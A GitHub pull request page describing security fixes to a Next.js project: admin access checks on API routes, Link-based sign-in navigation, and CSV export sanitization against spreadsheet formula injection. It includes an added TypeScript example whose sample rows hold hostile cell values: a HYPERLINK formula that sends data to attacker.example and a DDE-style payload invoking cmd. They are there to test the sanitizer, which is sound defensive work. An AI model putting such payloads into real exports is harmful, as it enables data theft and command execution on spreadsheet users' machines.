
Conversation

@codeunia-dev
Owner

@codeunia-dev codeunia-dev commented Sep 14, 2025

Summary by CodeRabbit

  • New Features
    • Added admin access gating for the Core Team admin page and related API endpoints, with loading and forbidden states.
  • Bug Fixes
    • CSV exports now sanitize values to prevent spreadsheet formula injection.
    • API endpoints validate inputs and return clearer status codes (400/401/403/500).
  • Refactor
    • Replaced window.location redirects with client-side navigation via Link for sign-in prompts across multiple forms, preserving button styling.
    • Minor syntax cleanup in error handling without changing behavior.

Deepak Pandey added 2 commits September 14, 2025 21:27
🔒 Security Fixes:
- Add admin authentication to admin-core-team API endpoints
- Prevent unauthorized access to admin data
- Add proper user session validation
- Use service role only for admin operations

🛡️ CSV Injection Protection:
- Sanitize CSV export data to prevent formula injection
- Add prefix for cells starting with =, +, -, @

🔗 Navigation Improvements:
- Replace window.location.href with Next.js Link components
- Improve SPA navigation and accessibility
- Fix all form authentication redirects

✅ Admin UI Security:
- Add client-side admin access guards
- Prevent non-admin users from accessing admin pages
- Show proper forbidden messages

All critical security vulnerabilities addressed per CodeRabbit review.
- Fix React hooks rules violation in admin page
- Move admin access check after all hooks
- Remove unused error variable in username page
- All builds now pass successfully
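
A worked version of the CSV sanitisation the commit message describes, added here as an example and not taken from the project's page.tsx: cells beginning with =, +, -, @ get a leading single quote, and (going beyond the PR's list) so do cells beginning with tab or carriage return, which some spreadsheet importers also treat as formula starters. It then applies RFC 4180 quoting so a crafted value cannot break out of its cell and shed the prefix. The function names and the sample application rows are constructed for the example.

```typescript
// Added example, not code from the codeunia repository: CSV export hardened
// against spreadsheet formula injection. Function names and sample data are
// constructed for illustration.

// Characters that Excel, LibreOffice and Google Sheets may interpret as the
// start of a formula. The PR lists = + - @; tab and CR are added here because
// some importers honour them as well.
const FORMULA_TRIGGERS = new Set(["=", "+", "-", "@", "\t", "\r"]);

// Neutralise a single cell: a leading single quote forces text interpretation.
function sanitizeCsvValue(value: unknown): string {
  if (value === null || value === undefined) return "";
  const text = String(value);
  if (text.length > 0 && FORMULA_TRIGGERS.has(text.charAt(0))) {
    return "'" + text;
  }
  return text;
}

// RFC 4180 quoting: wrap fields containing the delimiter, quotes or line
// breaks in double quotes and double any embedded quote, so a value cannot
// terminate its own cell and drop the sanitising prefix on the next one.
function quoteCsvField(text: string): string {
  return /[",\r\n]/.test(text) ? '"' + text.replace(/"/g, '""') + '"' : text;
}

function toCsvRow(fields: unknown[]): string {
  return fields.map((f) => quoteCsvField(sanitizeCsvValue(f))).join(",");
}

// Build a CSV document from a header list and row objects (CRLF per RFC 4180).
function toCsv(headers: string[], rows: Record<string, unknown>[]): string {
  const lines = [toCsvRow(headers), ...rows.map((r) => toCsvRow(headers.map((h) => r[h])))];
  return lines.join("\r\n") + "\r\n";
}

// Constructed sample: two applications, one with hostile "full_name" and "notes".
const SAMPLE_APPLICATIONS: Record<string, unknown>[] = [
  { full_name: "Asha Verma", email: "asha@example.com", status: "accepted", notes: null },
  {
    full_name: '=HYPERLINK("https://attacker.example/?c="&A1,"Open")',
    email: "mallory@example.com",
    status: "pending",
    notes: "@SUM(1+1)*cmd|' /C calc'!A0",
  },
];

function exportApplications(): string {
  return toCsv(["full_name", "email", "status", "notes"], SAMPLE_APPLICATIONS);
}

console.log(exportApplications());
```

Two caveats a reviewer would raise on this approach: a plain negative number such as -5 also gets the quote, so columns that are meant to stay numeric need either an exemption for values that parse as numbers or a separate export path; and the prefix is visible to any consumer that reads the file as text rather than through a spreadsheet, so apply it on the spreadsheet-facing export only.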
@vercel

vercel bot commented Sep 14, 2025

The latest updates on your projects. Learn more about Vercel for GitHub.

Project   Deployment   Preview    Comments           Updated (UTC)
codeunia  Building     Building   Preview Comment    Sep 14, 2025 4:00pm

@coderabbitai
Contributor

coderabbitai bot commented Sep 14, 2025

Caution: Review failed. The pull request is closed.

Walkthrough

Server-side admin authentication and authorization were added to the admin core team API routes and the admin page. CSV export now sanitizes fields. Several forms switched unauthenticated sign-in CTAs from window.location redirects to Next.js Link-based navigation. A bindingless catch was introduced in a username page without changing behavior.

Changes

Cohort / File(s): Summary

Admin API auth and access control
  app/api/admin-core-team/route.ts
  Added server-side auth helpers (SSR and service clients). Enforced admin checks in GET/POST/PATCH with 401/403 handling. Switched to service client for data ops, explicit field selection, input validation, and improved error responses.

Admin page gating and CSV sanitization
  app/admin/forms/core-team/page.tsx
  Added useAuth-based gating (loading, forbidden). Introduced CSV value sanitization to prefix risky leading chars to prevent spreadsheet injection.

Sign-in CTA navigation refactor (forms)
  components/forms/collaboration-form.tsx, components/forms/core-team-form.tsx, components/forms/judges-form.tsx, components/forms/mentor-form.tsx, components/forms/sponsorship-form.tsx, components/forms/volunteer-form.tsx
  Replaced window.location redirects with Next.js Link via Button asChild to navigate to /auth/signin. Imports updated accordingly; UI text unchanged.

Syntactic catch update
  app/[username]/page.tsx
  Replaced catch (error) with bindingless catch {}; no functional change.

Sequence Diagram(s)

sequenceDiagram
  autonumber
  participant C as Client
  participant R as API Route (/api/admin-core-team)
  participant A as requireAdmin (SSR)
  participant DB as Supabase (Service Client)
  
  rect rgb(240,248,255)
    note over C,R: GET (admin list)
    C->>R: GET /api/admin-core-team
    R->>A: Validate session + is_admin
    A-->>R: 200 OK (admin) / 401 / 403
    alt Authorized
      R->>DB: select core_team_applications (fields..., order desc)
      DB-->>R: rows or error
      R-->>C: 200 rows / 500 error
    else Unauthorized
      R-->>C: 401/403
    end
  end

  rect rgb(245,255,240)
    note over C,R: POST/PATCH (update)
    C->>R: POST/PATCH with payload
    R->>A: Validate session + is_admin
    A-->>R: 200 OK (admin) / 401 / 403
    alt Authorized
      R->>R: Validate input (status/id)
      alt Valid
        R->>DB: update core_team_applications (set status/notes, updated_at)
        DB-->>R: updated row or error
        R-->>C: 200 row / 500 error
      else Invalid
        R-->>C: 400 Bad Request
      end
    else Unauthorized
      R-->>C: 401/403
    end
  end
sequenceDiagram
  autonumber
  participant U as User
  participant F as Form (unauthenticated)
  participant L as Next.js Link
  participant R as Router

  U->>F: View form (not signed in)
  F->>L: Render Button asChild with Link "/auth/signin"
  U-->>L: Click "Sign In to Continue"
  L->>R: Client-side route to /auth/signin
  R-->>U: Sign-in page

Estimated code review effort

🎯 4 (Complex) | ⏱️ ~60 minutes

Poem

I thump with cheer on admin hills,
New gates now guard the data mills.
Links hop light—no full-page fright—
To sign-in burrows, swift and bright.
CSVs de-fanged of sneaky strings,
Safe carrots counted—happy springs! 🥕✨


📜 Recent review details

Configuration used: CodeRabbit UI

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 63014f9 and e72d3f2.

📒 Files selected for processing (9)
  • app/[username]/page.tsx (1 hunks)
  • app/admin/forms/core-team/page.tsx (4 hunks)
  • app/api/admin-core-team/route.ts (3 hunks)
  • components/forms/collaboration-form.tsx (2 hunks)
  • components/forms/core-team-form.tsx (2 hunks)
  • components/forms/judges-form.tsx (2 hunks)
  • components/forms/mentor-form.tsx (2 hunks)
  • components/forms/sponsorship-form.tsx (2 hunks)
  • components/forms/volunteer-form.tsx (2 hunks)


@codeunia-dev codeunia-dev merged commit 8af73ae into main Sep 14, 2025
3 of 5 checks passed